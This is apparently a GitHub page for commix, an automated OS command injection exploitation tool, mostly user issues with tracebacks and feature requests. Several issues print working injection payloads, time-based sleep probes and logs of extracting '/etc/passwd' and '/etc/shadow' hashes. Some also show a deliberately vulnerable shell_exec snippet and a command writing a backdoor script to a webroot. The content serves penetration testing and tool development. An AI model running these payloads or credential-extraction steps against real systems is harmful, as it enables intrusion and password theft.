commixproject / commix

Automated All-in-One OS Command Injection Exploitation Tool.

Home Page: https://commixproject.com

License: Other

Python 100.00%
bugbounty command-injection commix detection exploitation open-source pentesting python takeover vulnerability-scanner

commix's People

Contributors

anonymousdouble, apprentice, blshkv, daniruiz, dnet, g0tmi1k, galihap76, jhelie, kazgangap, n00b-bot, placidina, shelld3v, stasinopoulos, timgates42, verfosec


commix's Issues

Feature Request: JSP


So I'm trying to use this tool to make my workflow with this form easier. The program executes the GET parameters on the system and displays the output in line. For some reason commix won't pick up on it. Have I configured something wrong?


Index Error

This may be a "DUH" but I am new.
Using the example command I get the following error

python commix.py --verbose --hostname --url=192.168.0.171 --auth-cred=admin: --data="ip=INJECT_HERE&submit=submit"

Traceback (most recent call last):
  File "commix.py", line 322, in <module>
    main()
  File "commix.py", line 297, in main
    controller.do_check(url, filename)
  File "/code/src/core/injections/controller/controller.py", line 131, in do_check
    if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
  File "/code/src/core/injections/semiblind_based/techniques/file_based/fb_handler.py", line 469, in exploitation
    if fb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
  File "/code/src/core/injections/semiblind_based/techniques/file_based/fb_handler.py", line 103, in fb_injection_handler
    if check_version[0] > "2.3":
IndexError: list index out of range

Running on Windows

When I try to run the script, I run into this error.

> python commix.py
Traceback (most recent call last):
  File "commix.py", line 41, in <module>
    from src.utils import logs
  File "d:\commix\src\utils\logs.py", line 23, in <module>
    import readline
ImportError: No module named readline

Later I learnt readline is not supported in Windows.

> pip install readline
Collecting readline
  Downloading readline-6.2.4.1.tar.gz (2.3MB)
    100% |################################| 2.3MB 340kB/s
    Complete output from command python setup.py egg_info:
    error: this module is not meant to work on Windows

Response with 302 Status Code Prevents Commix Execution

Hi there,

I manually identified a blind command injection and was trying to use Commix (current Kali version) to assist me during the exploitation. However, all my tries resulted in the following error:

[*] Checking connection to the target URL... [ FAILED ]

This is probably caused by the target URL being requested without its POST data. In such cases, it returns a 302 status and redirects back to the original form, which is on another page.

I guess Commix probably interprets this as an error or a not existing page. Is this a correct assumption? Could this be fixed in future updates, at least bypassing this first check?

Cheers!
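The behaviour described in this report (a bare GET is answered with a 302 back to the form, and the connectivity check treats that as a failure) can be avoided by sending the real POST body in the check and by counting any HTTP status, redirects included, as proof that the host is reachable. The following is an added example, not commix's own code; the target is simulated by a small local http.server so the snippet runs offline, and the handler names and paths are constructed for the illustration.

```python
"""Added example (not commix code): a reachability check that sends the
POST body and treats a 3xx answer as "target reachable".

The target is a constructed local http.server that answers 302 to a bare
GET and 200 to the POST the form actually submits.
"""
import http.server
import threading
import urllib.error
import urllib.parse
import urllib.request


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so the 3xx itself is visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None          # returning None makes urllib raise HTTPError(302)


def check_connection(url, data=None, method=None, timeout=5):
    """Return (reachable, status).

    Any HTTP status, including 3xx and 4xx, means the host answered; only a
    transport-level failure (DNS, refused connection, timeout) is 'unreachable'.
    When data is given the request is a POST, exactly as the form would send it.
    """
    body = urllib.parse.urlencode(data).encode() if data else None
    req = urllib.request.Request(url, data=body, method=method)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return True, resp.status
    except urllib.error.HTTPError as err:   # 3xx/4xx/5xx still prove reachability
        return True, err.code
    except urllib.error.URLError:           # DNS failure, refused connection, ...
        return False, None


class _FormHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable form page."""

    def do_GET(self):
        # A GET without the form's POST data bounces back to the form page.
        self.send_response(302)
        self.send_header("Location", "/form.html")
        self.end_headers()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        self.rfile.read(length)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_demo_server():
    srv = http.server.HTTPServer(("127.0.0.1", 0), _FormHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/exec.php" % srv.server_address[1]


def demo():
    """Run both checks against the constructed server and return their results."""
    srv, url = start_demo_server()
    try:
        bare = check_connection(url)                                   # GET -> 302
        real = check_connection(url, {"ip": "127.0.0.1", "submit": "submit"})  # POST -> 200
    finally:
        srv.shutdown()
        srv.server_close()
    return bare, real


if __name__ == "__main__":
    print(demo())
```

A check written this way reports the 302 as a reachable host rather than aborting, and the POST variant reaches the page the injection actually lives on.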

"Critical: name or service not known"

Hi there,

I'm @7MinSec on Twitter and just shot you a couple tweets regarding how I might leverage a Burp-identified SQLi vuln. Oh, I'm also brand new(b) to Commix :-)

Burp identified a SQLi through Collaborator DNS/HTTP interaction, but I couldn't recreate this or get any further with SQLmap, so a friend said to give Commix a shot.

The basic command I'm running is:

commix.py -u http://url --data="page=blah&id=123" --cookie=ABUNCHOFSTUFF -p id

The classic injection technique fires up and gets somewhere between 0.2 and 1.3% done (on average) and then says:

[X] Critical: Name or service not known and then the app just hangs there indefinitely.

Can you help me figure out what the error is about exactly, and/or any tips for further exploring/exploiting what Burp has identified?

Brian

Feature Request: API

Like SQLMap for SQLi, I think Commix is the de facto standard tool for Command Injection.
I am working on a project for automated mobile application security assessment called Mobile Security Framework (MobSF)
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF

So I have a module for Web API testing named the API Fuzzer that will fuzz and uncover security vulnerabilities in the web and backend APIs of mobile apps. I think it's always better to use/integrate existing tools that work great than to reinvent the wheel.

Mobile Security Framework's API Fuzzer can generate random URL / POST Body fuzz points and I think commix works on a single URL/ Body Fuzz field. If we combine the crawling and fuzzing capabilities of MobSF's API Fuzzer and the command injection detection and exploitation of Commix, I think it would become a great product for the community.

If this sounds good to you, all I need from you is an API for commix to which I can send URLs with fuzz points and which returns an ID; later I can poll back an API with this ID to see if commix detected a Command Injection. Let me know your thoughts.

/dev/null on Windows

Hi, I tried to use it with Tor on Win7, but got this error:

File "\src\utils\requirments.py", line 24, in do_check
null = open("/dev/null", "w")
IOError: [Errno 2] No such file or directory: '/dev/null'

Google told me the fix:

import os
 null = open(os.devnull, "w")

After this:

Critical: HTTP Error 501: Tor is not an HTTP Proxy

But Tor doesn't provide an HTTP proxy, only SOCKS5. Maybe.

Sorry, my English is bad, this is my first post.

file base error

Hi,
this error occurs when I use the file-based technique:

Trying to create a file on /...
Traceback (most recent call last):
  File "commix.py", line 324, in <module>
    main()
  File "commix.py", line 299, in main
    controller.do_check(url, filename)
  File "/root/commix/src/core/injections/controller/controller.py", line 168, in do_check
    if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
  File "/root/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 482, in exploitation
    if fb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
  File "/root/commix/src/core/injections/semiblind/techniques/file_based/fb_handler.py", line 196, in fb_injection_handler
    output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
  File "/root/commix/src/core/injections/semiblind/techniques/file_based/fb_injector.py", line 429, in injection_output
    return output
UnboundLocalError: local variable 'output' referenced before assignment

type '?' for available options crash

Running version v1.5-dev#14

I get the following crash when pressing y to the Pseudo-Terminal (type '?' for available options) prompt:

$ ./commix.py --url="http://www.example.com/a.php?b=INJECT_HERE" --prefix="|" --suffix="%23" --os="U" --cookie="session=601d3965545ef...8dd6eaa82ba81d" 
                                       __           
   ___    ___     ___ ___     ___ ___ /\_\   __  _   
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v1.5-dev#14
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ http://commixproject.com
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

[*] Checking connection to the target URL... [ SUCCEED ]
[+] A previously stored session has been held against that host.
[?] Do you want to resume to the classic injection point? [Y/n/q] > y
[+] The parameter 'adapter' seems injectable via (results-based) classic injection technique.
    [~] Payload: %3Becho ONNPSI$((38+31))$(echo ONNPSI)ONNPSI%2b%23

[?] Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > ?

  ---[ Available options ]---     
  Type '?' to get all the available options.
  Type 'back' to move back from the current context.
  Type 'quit' (or use <Ctrl-C>) to quit commix.
  Type 'reverse_tcp' to get a reverse TCP connection.
  Type 'bind_tcp' to set a bind TCP connection.
  
Traceback (most recent call last):
  File "./commix.py", line 766, in <module>
    main()
  File "./commix.py", line 716, in main
    controller.do_check(url, filename)
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 396, in do_check
    if perform_checks(url,filename) == False:
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 381, in perform_checks
    get_request(url, http_request_method, filename, delay)
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 273, in get_request
    injection_proccess(url, check_parameter, http_request_method, filename, delay)
  File "/home/pentest/commix/src/core/injections/controller/controller.py", line 102, in injection_proccess
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
  File "/home/pentest/commix/src/core/injections/results_based/techniques/classic/cb_handler.py", line 436, in exploitation
    if cb_injection_handler(url, delay, filename, http_request_method) == False:
  File "/home/pentest/commix/src/core/injections/results_based/techniques/classic/cb_handler.py", line 364, in cb_injection_handler
    go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, delay, go_back_again)
TypeError: 'NoneType' object is not iterable

Installation issue : ./commix.py: No such file or directory

I got an issue after installing :
(*) Starting the installer... [ SUCCEED ]
(*) Installing commix into the /usr/share/commix... [ SUCCEED ]
(*) Installing commix to /usr/bin/commix... [ SUCCEED ]
(!) The installation is finished! Type 'commix' to launch it.
@:/opt$ commix
/usr/bin/commix: line 2: ./commix.py: No such file or directory

Fixed by changing it to /usr/share/commix/commix-master/commix.py in /usr/bin/commix.

commix-master is missing in the default path.

Previous session and added options

Hey.
During the test, I received a positive response:

(!) The (GET) 'order id' parameter is vulnerable to Blind Command Injection. (+) Type: Blind Command Injection (+) Technique: Time-Based Injection Technique (+) Payload: ; str=$(echo CQHGXC); str1=${#str}; if [ 6 -ne ${str1} ]; then sleep 0; else sleep 1; fi
(?) Do you want a Pseudo-Terminal? [Y/n/q] > y

Added: --current-user --hostname --is-root --is-admin --sys-info --users --passwords --privileges

As it happened: commix --tor --url="http://www.blablabla.com/order.php?orderid=INJECT_HERE" --current-user --hostname --technique="time-based" --is-root --is-admin --sys-info --users --passwords --privileges

And most of the time it cannot find the vulnerability (it takes a very long time to find). Since it was already found, is there an option to substitute it? (+) Payload: ; str=$(echo CQHGXC); str1=${#str}; if [ 6 -ne ${str1} ]; then sleep 0; else sleep 1; fi
Are the results of the previous session not saved? (example: SQLMAP)
When adding an option, the test begins again, which is not very convenient.
Sorry, my bad English.

THIS ERROR AGAIN

Hi,
this error message appears when I try to test:

(*) Setting the (GET) 'trg' parameter for tests.
(*) Testing the classic injection technique... FAILED
(*) Testing the eval-based injection technique... FAILED
(*) Testing the time-based injection technique... SUCCEED
The (GET) 'trg' parameter is vulnerable to Blind Command Injection.
(+) Type : Blind Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : & sleep 0 && str=$(echo FBXUKV) && str1=${#str} && [ 6 -eq ${str1} ] && sleep 1 //

(*) Fetching '/etc/passwd' to enumerate users entries...
(*) Retrieving the length of execution output... SUCCEED Retrieved 5 characters.
(*) Grabbing the output, please wait... 100.0% Identified 1 entries in '/etc/passwd'.
Traceback (most recent call last):
  File "commix.py", line 329, in <module>
    main()
  File "commix.py", line 304, in main
    controller.do_check(url, filename)
  File "/root/commix/src/core/injections/controller/controller.py", line 127, in do_check
    if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
  File "/root/commix/src/core/injections/blind/techniques/time_based/tb_handler.py", line 356, in exploitation
    if tb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
  File "/root/commix/src/core/injections/blind/techniques/time_based/tb_handler.py", line 253, in tb_injection_handler
    tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
  File "/root/commix/src/core/injections/blind/techniques/time_based/tb_enumeration.py", line 267, in do_check
    system_users(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
  File "/root/commix/src/core/injections/blind/techniques/time_based/tb_enumeration.py", line 180, in system_users
    print " ("+str(count)+") '" + Style.BRIGHT + Style.UNDERLINE + fields[0]+ Style.RESET_ALL + "'" + Style.BRIGHT + is_privilleged + Style.RESET_ALL + "(uid=" + fields[1] + "). Home directory is in '" + Style.BRIGHT + fields[2]+ Style.RESET_ALL + "'."
IndexError: list index out of range

commix-master get this error

Best greetings to you,

when I try to use commix.py to test a website for shell injection on Kali Sana, it gets an error, as in these lines:

Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
Traceback (most recent call last):
  File "commix.py", line 313, in <module>
    main()
  File "commix.py", line 207, in main
    if response.info()['server'] :
  File "/usr/lib/python2.7/rfc822.py", line 388, in __getitem__
    return self.dict[name.lower()]
KeyError: 'server'

and I just use the --current-user with no other options
I need your help please

Question about license

Hi

I have a question about the license file: in the header of commix.py you have GPL-3.0+, in readme/COPYING I see GPL-3.0+ in the first part, but the full license text makes reference to the AGPL-3.0 license. Could you clarify what the correct license for commix is?

Thank you very much!

Regards

Feature Request: Burp Logfile Parsing

Wild idea that just struck me while having a look at this project. It would be neat feature for it to digest Burp output files and use them as inputs for fuzzing to find bugs and exploit them :)

Just a thought, I believe SQLmap implemented this some time ago :)

/root/commix/src/core/modules/shellshock/shellshock.py exception raised

Hi,

I have come across an exception in the Shellshock module Python file;
the exception happens at line number 736, "print "\n" + settings.print_critical_msg(err_msg)", when the err_msg variable has not been assigned before :(

In order to mitigate it I just added a line before it with the assignment err_msg = ''.
Please take it into consideration for the next release :)

Feature Request: automatically parse parameters and crawl

Hi,
Great tool !
My suggestion would be the following; it's bluntly stolen from sqlmap, but would be useful in commix.
1. Accept an HTTP request in a file as a baseline for testing, and map all the parameters in the request so you could use a parameter selection option (-p parameter1,parameter2,...).
2. Accept an HTTP request in a file as a baseline for testing, and use a wildcard locator in the request file to point to where testing should be done (in sqlmap you can use * to specify where to test, which gives you a lot of space in the testing area).
3. An option for the tool to spider the site, look for parameters and test them automatically (again, stolen from sqlmap --forms --crawl).

Thanks and keep up the great work.
Roy

Command Not Found.

Problem was solved. Sorry it's my mistake. I have to use parameter --url="" like this.

I'm using Kali Linux. I'm trying to use commix on some discovered links, and I faced the problem described below:

[commix ASCII-art banner: v1.7-dev#4, http://commixproject.com (@commixproject)]

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

[*] Checking connection to the target URL... [ SUCCEED ]
[!] Warning: Heuristics have failed to identify target server.
[!] Warning: Heuristics have failed to identify server's operating system.
[?] Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > U
-bash: U: command not found

[9]+ Stopped ./commix.py -u ...............................................................

OR --- Something like this:

Copyright (c) 2014-2016 Anastasios Stasinopoulos (@ancst)
+--

[*] Checking connection to the target URL... [ SUCCEED ]
[*] Setting the POST parameter 'gonder' for tests.
[!] Warning: Due to the relatively slow response of 'cmd.exe' in target host, there may be delays during the data extraction procedure.
[*] Testing the classic injection technique... [ FAILED ]
[*] Testing the eval-based code injection technique... [ FAILED ]
[*] Testing the time-based injection technique... [ FAILED ]
[*] Trying to create a file in '\inetpub\wwwroot.....'...
[!] Warning: It seems that you don't have permissions to read and/or write files in '\inetpub\wwwroot....'.
[?] Do you want to try the temporary directory (C:\Windows\TEMP) [Y/n/q] > y
-bash: y: command not found

[3]+ Stopped commix -u ......................................................

Detecting double blind injection

Hello,

Here is the issue I shared my ideas about at the end of your BHEU presentation. It was an awesome session; nice to meet you there 👍 btw.

Most modern web applications use command execution with the & sign, which means execution runs as a background job. Thus there will NOT be any output, nor a time difference between request and response. This means commix is not capable of detecting those cases.

For example:

Image processing is a really time-consuming job. Imagine that every single image processing takes 50 seconds; we cannot expect users to wait until the job is done!!!

The following execution will convert an image. Basically we can fire up that command and then immediately show a "Your task will end in a few minutes. We will notify you" information message.

Vulnerable code:

shell_exec("php processimage.php someimage.jpeg ".$_GET['cmd']." > /dev/null &");

This code is still vulnerable to command injection. It's kind of a blind type of vulnerability, but time delay payloads won't work. Therefore I'm going to call it Double blind injection.

I have 3-4 ways to handle this in a manual penetration test, which could be reproducible for automation as well, but let's start with your thoughts first, guys.

Feature Request: ASP.NET

Hi there,

Have a Windows Server with IIS 8.0 running.

Did a test against an application hosted on it, using the following CLI:

python commix.py --url="https://target/1.aspx?param=INJECT_HERE" --level=3

Thus, I got a possible command injection according to the received message:
"
(*) Testing the file-based injection technique... SUCCEED The (GET) 'Param' parameter is vulnerable to Semiblind Command Injection.
(+) Type : Semiblind Command Injection
(+) Technique : File-Based Injection Technique
(+) Payload : powershell.exe -InputFormat none Add-Content LMCVOT.txt LMCVOT
"
Going ahead, Commix offered to open an os_shell, which had the following options:

"(?) Do you want a Pseudo-Terminal? [Y/n/q] > Y"

It opened a "commix(os_shell) >" console and I was quite impressed. However, I tried a couple of Windows commands like ipconfig / dir, etc. Nothing worked. Even PowerShell equivalents, with the same negative result.

Then I issued a help command to check out my options:

"
Type '?' to get all the available options.
Type 'set' to set a context-specific variable to a value.
Type 'back' to move back from the current context.
Type 'quit' (or use <Ctrl-C>) to quit commix.
Type 'os_shell' to get into an operating system command shell.
Type 'reverse_tcp' to get a reverse TCP connection.
"

I typed reverse_tcp but there is no help available for this option, such as which parameters I have to use or similar details. Bottom line: please, can you document this option a little more, or at least give me some clues as to how it is supposed to work?

On the other hand I did another test using the following cli:

python commix.py --url="https://site/param=INJECT_HERE" --level=3 --file-write="/home/commix/backdoor.ps1" --file-dest="\inetpub\wwwroot\app\app00\backdoor.ps1"

The odd thing is that commix apparently doesn't care about my custom payload. It used the same default txt payload.

At the end of this particular test it said the same thing:
"
(*) Testing the file-based injection technique... SUCCEED The (GET) 'Param' parameter is vulnerable to Semiblind Command Injection.
(+) Type : Semiblind Command Injection
(+) Technique : File-Based Injection Technique
(+) Payload : powershell.exe -InputFormat none Add-Content AQLNMS.txt AQLNMS
"

Please advise.

Cheers.

Failed to parse json payload

Hi,

I found an issue when I input a JSON-formatted payload like this:

python commix.py -u http://xxxx --data '{"dir" :{"path": "."}}'

When there is whitespace before ":", commix does not work correctly.

commix/src/core/requests/parameters.py: 225

value = re.findall(r'\:\"(.*)\"', parameter)

The regular expression here matches nothing if there is whitespace.

I think, it should be

value = re.findall(r'\:\s*\"(.*)\"', parameter)
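Relaxing the regular expression fixes the whitespace case, but a regex still breaks on nested objects, arrays, escaped quotes and non-string values. The following is an added example (not commix's code) that parses the body with the json module, enumerates every string leaf as a candidate injection point by its JSON path, and re-serializes the body with the payload placed at that leaf, so escaping is always correct. The body and helper names are constructed for the illustration.

```python
"""Added example (not commix code): find injectable string values in a JSON
POST body with the json module instead of a regular expression, so spacing
such as '"dir" :{"path": "."}' does not matter. Each string leaf is
identified by its JSON path, and a body with the payload written at that
leaf is emitted with correct JSON escaping.

SAMPLE_BODY and the helper names are constructed for this example.
"""
import json

SAMPLE_BODY = '{"dir" :{"path": "."}, "opts": ["fast", {"user": "guest"}], "n": 3}'


def string_leaves(obj, path=()):
    """Yield (path, value) for every string value, however deeply nested."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from string_leaves(value, path + (key,))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from string_leaves(value, path + (index,))
    elif isinstance(obj, str):
        yield path, obj


def inject_at(obj, path, payload, append=True):
    """Return a copy of obj with payload written at path.

    By default the payload is appended to the original value so that the
    application's own logic (e.g. a valid directory name) still executes.
    """
    copy = json.loads(json.dumps(obj))     # deep copy via round-trip
    node = copy
    for key in path[:-1]:
        node = node[key]
    node[path[-1]] = (node[path[-1]] + payload) if append else payload
    return copy


def fuzz_bodies(body, payload):
    """Parse body once, then emit (path, serialized body) per string leaf.

    Raises ValueError with the parser's message when the data is not JSON,
    instead of silently testing nothing.
    """
    try:
        obj = json.loads(body)
    except json.JSONDecodeError as err:
        raise ValueError("POST data is not valid JSON: %s" % err)
    return [(path, json.dumps(inject_at(obj, path, payload)))
            for path, _ in string_leaves(obj)]


if __name__ == "__main__":
    for path, body in fuzz_bodies(SAMPLE_BODY, ";id"):
        print(path, body)
```

Because the payload travels through json.dumps, a payload containing a double quote arrives at the server escaped rather than breaking the document, which the regex approach cannot guarantee.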

Commix failing when creating file

Hi, I've been having this issue a lot whereby I get a series of errors, ending with 'Index out of range', notably when creating a file. I've tried updating Python and commix but no luck, unless I'm updating them wrong...? Would appreciate help, thanks.

Run fails - Network is unreachable

Hi,

Just checked out the latest code on 2 (VM) boxes: Kali (via the Kali repo) and Ubuntu (via git clone). Running commix fails when on a local, private network, i.e. without access to the Internet. Not sure if this is by design?

Easy to reproduce: change the network adaptor to Host-Only networking, and try running commix. It fails with:

# commix
[x] Critical: Network is unreachable.

log file error

Get a traceback when I try to run commix ...

Traceback (most recent call last):
  File "commix.py", line 877, in <module>
    filename = logs_filename_creation()
  File "commix.py", line 108, in logs_filename_creation
    filename = logs.create_log_file(url, output_dir)
  File "/home/simon/commix/src/utils/logs.py", line 61, in create_log_file
    parts = url.split('//', 1)
AttributeError: 'NoneType' object has no attribute 'split'

Feature request: Raw request

Make it read from a raw request file similar to sqlmap -r req.txt. This option can substitute the options:

    -u URL, --url=URL   Target URL.
    --data=DATA         Data string to be sent through POST.
    --host=HOST         HTTP Host header.
    --referer=REFERER   HTTP Referer header.
    --user-agent=AGENT  HTTP User-Agent header.
    --param-del=PDEL    Set character for splitting parameter values.
    --cookie=COOKIE     HTTP Cookie header.
    --cookie-del=CDEL   Set character for splitting cookie values.
    --headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
...

Please add git tags on releases

Firstly, thanks for sharing your code with the open-source world.

As you may or may not be aware, we have included your tool in our Kali Linux penetration testing distribution so it can be easily installed by our large user-base.

As the distribution includes hundreds of tools, keeping them updated is a significant undertaking. We would like to ensure that your tool is always kept as current as possible so that our users can benefit from the latest features and fixes. You could help us in this task immensely by tagging your releases here on GitHub. Tagging releases allows us to automate the process of checking for new releases, ensuring that tools get updated far more quickly.

Tagging can be included in your workflow very easily and would go a long way to helping us keep your tool updated in our distribution. The most common type of tag is the "lightweight" version as follows (where 0.3 is the new version number):

git tag v0.3
git push --tags

Thanks!

Directory create problem

C:\Python27\commix-master\commix-master>commix.py --url="http://windows2003-sp0:8081/dilemma/CI/PHP/System-VisibleExec-OpenCommand-NoAmpersand/default2.php?param=1"
[commix ASCII-art banner: { v0.2b-NonGit }]

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... Traceback (most recent call last):
  File "C:\Python27\commix-master\commix-master\commix.py", line 342, in <module>
    main()
  File "C:\Python27\commix-master\commix-master\commix.py", line 206, in main
    filename = logs.create_log_file(url, output_dir)
  File "C:\Python27\commix-master\commix-master\src\utils\logs.py", line 43, in create_log_file
    os.mkdir(output_dir + host + "/")
WindowsError: [Error 267] The directory name is invalid: '.output/windows2003-sp0:8081/'

Feature Request: Newline display problem (classic result based technique)

There is a problem with parsing newlines in the pseudo shell. Consider these outputs:

commix(os_shell) > ls

index.php license.txt readme.html wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php

kali:~# curl 'http://10.11.1.234/?p=1&cmd=ls'
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
xmlrpc.php

Tested on commix versions v1.5-dev#4 and v1.3 in several Linux injections.

During work it is

Hi, why can't commix really do the injection on a website? It gives me "command could not return any output, due to pipe (|) filtration on target".
This means that it is weak against filtration.

HTTPS scan fails with traceback

When I scan an HTTPS-based website, I get a traceback error:

[*] Checking connection to the target URL... Traceback (most recent call last):
  File "./commix.py", line 771, in <module>
    main()
  File "./commix.py", line 269, in main
    headers.check_http_traffic(request)
  File "/usr/share/commix/src/core/requests/headers.py", line 112, in check_http_traffic
    http_response(response.info())
AttributeError: 'NoneType' object has no attribute 'info'

I tried v1.5-stable and the latest build v1.6-dev#5
OS = Kali 2016.2
adding --force-ssl doesn't seem to help...

Is it something I'm doing wrong?

Kudos for this nice project BTW!

commix get this error

Hi,
thanks for all the work here.
When I updated commix today, this error happened:

(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : %26 sleep 0 %26%26 str=$(echo FDQWMO) %26%26 str1=${#str} %26%26 [ 6 -eq ${str1} ] %26%26 sleep 5 %27

(*) Fetching '/etc/shadow' to enumerate users password hashes...
(*) Retrieving the length of execution output... SUCCEED Retrieved 5 characters.
(*) Grabbing the output, please wait... 100.0% Identified 3 entries in '/etc/shadow'.
Traceback (most recent call last):
  File "commix.py", line 324, in <module>
    main()
  File "commix.py", line 299, in main
    controller.do_check(url, filename)
  File "/root/commix/src/core/injections/controller/controller.py", line 158, in do_check
    if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
  File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_handler.py", line 356, in exploitation
    if tb_injection_handler(url, delay, filename, http_request_method, url_time_response) == False:
  File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_handler.py", line 253, in tb_injection_handler
    tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
  File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_enumeration.py", line 262, in do_check
    system_passwords(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
  File "/root/commix/src/core/injections/blind_based/techniques/time_based/tb_enumeration.py", line 215, in system_passwords
    if fields[1] != "*" and fields[1] != "!" and fields[1] != "":
IndexError: list index out of range
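This traceback and the earlier /etc/passwd one ("THIS ERROR AGAIN") share a root cause: the enumeration code indexes fields[1] or fields[2] on a line that does not have that many colon-separated fields, which happens whenever a blind extraction yields a truncated or otherwise malformed entry. The following is an added example, not commix's code, of parsing recovered passwd and shadow text defensively: each line is validated before it is indexed, and malformed lines are reported instead of aborting the whole run. The sample files are constructed and deliberately include a broken entry.

```python
"""Added example (not commix code): parse recovered '/etc/passwd' and
'/etc/shadow' text without assuming every line is well formed. Lines with
too few fields are collected in a 'skipped' list rather than crashing on
an IndexError part-way through enumeration.

SAMPLE_PASSWD and SAMPLE_SHADOW are constructed for this example; the
hash value is a placeholder, not a real hash.
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
broken
"""

SAMPLE_SHADOW = """root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:!:19000:0:99999:7:::
truncated_entry
"""


def parse_passwd(text):
    """Return (users, skipped).

    users: list of dicts with name, uid, home, shell and an is_root flag
    (uid 0, which is what a privilege check should key on, not the name).
    skipped: non-empty lines with fewer than the 7 fields passwd(5) requires.
    """
    users, skipped = [], []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            if line.strip():
                skipped.append(line)
            continue
        users.append({
            "name": fields[0],
            "uid": fields[2],
            "home": fields[5],
            "shell": fields[6],
            "is_root": fields[2] == "0",
        })
    return users, skipped


def parse_shadow(text):
    """Return (hashes, skipped).

    Only entries that carry a real hash are returned: an empty field, '*'
    or a leading '!' means the account is locked or has no password to crack.
    """
    hashes, skipped = [], []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            if line.strip():
                skipped.append(line)
            continue
        if fields[1] in ("", "*") or fields[1].startswith("!"):
            continue
        hashes.append((fields[0], fields[1]))
    return hashes, skipped


if __name__ == "__main__":
    users, bad = parse_passwd(SAMPLE_PASSWD)
    for user in users:
        print("%-10s uid=%-5s home=%s%s" % (user["name"], user["uid"], user["home"],
                                           " (root)" if user["is_root"] else ""))
    print("skipped passwd lines:", bad)
    hashes, bad = parse_shadow(SAMPLE_SHADOW)
    print("crackable hashes:", hashes, "skipped shadow lines:", bad)
```

Reporting the skipped lines matters in a blind extraction: a truncated entry usually means the character-by-character retrieval was cut short, which is worth re-running rather than silently losing.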


Write logfile in proper path

Hi!

I am working to include commix in Debian. However, commix writes its logfile in the path from which it is launched; for this reason, I created this patch to make commix write the logfile in the proper path (the home directory).

02_write_log_in_home.diff

Thanks :)
